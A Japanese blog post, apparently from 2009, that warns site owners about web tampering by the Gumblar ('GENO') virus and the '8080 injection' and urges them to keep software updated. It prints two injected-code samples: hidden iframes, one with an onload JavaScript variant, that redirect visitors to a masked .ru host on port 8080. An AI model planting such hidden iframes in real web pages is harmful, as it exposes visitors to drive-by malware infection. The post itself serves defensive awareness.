|
ブラウザでページを単に見ただけでウイルスが発動してしまう恐れのある「ウェブ改ざん」による不正なコードの埋め込み。今年の5月には、「Gumblarウイルス」(通称「GENOウイルス」)のパンデミックが話題になりましたーな。 ・正規Web改ざんによるウイルス感染を防ぐには (トレンドマイクロ インターネット・セキュリティ・ナレッジ) 「GENOウイルス」騒動ほどでないにしろ、今現在でも改ざんされて陥落してる日本国内の一般サイトをたま〜に見かけます。これはページを運営してる人のマシンが、FTPのパスワードを抜くコンピュータウイルスに感染し、外部から不正なコードをページに挿入されてしまう形。  ・Macの端末からだと「攻撃サイトとして報告されています!」〜 (Yahoo!知恵袋) ・ホームページのウイルス?スパム?について・・・ (OKWave) ちなみに、ここ数週間で何だか目立ってるのが、ロシアドメインへ飛ばすインラインフレームのタグ。「8080攻撃」「8080インジェクション」と呼ばれてるシロモノです。Googleで検索すると、これについて問い合わせてる海外のフォーラムなどのページがたくさんヒットします。(改ざんの実例画像) <iframe src="http://●●●●.ru:8080/index.php" width=** height=**></iframe>不正なコードが埋め込まれ「ウイルス発信サイト」へ変貌してしまったページがGogoleの検索結果にヒットすると、『このサイトはコンピュータに損害を与える可能性があります。』と表示され、アクセスがブロックされる場合があります。(Yahoo!検索にはこういう機能はないん) ウイルス対策ソフトを導入しとくのは当然ながら、改ざんによる攻撃手法は、多くが有名ソフトウェアの旧バージョンにある不具合(脆弱性)を悪用するので、ちゃんと最新版が入ってるか確認しましょ!  ・Microsoft系ソフトウェアの更新 → Windows Update ・Adobe系 (Flash Player/Adobe Reader) Apple QuickTime RealPlayer などの更新 (10月18日 追記...) 何だか不正なコードが変わり始めてますなぁ。インラインフレームのonload属性にJavaScriptタグを用意して飛ばすスタイル。 <iframe frameborder="0" onload="if (!this.src){ this.src='http://●●●●.ru:8080/index.php'; this.height='0'; this.width='0';}" >(意味のない英文字の羅列)</iframe>
|
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
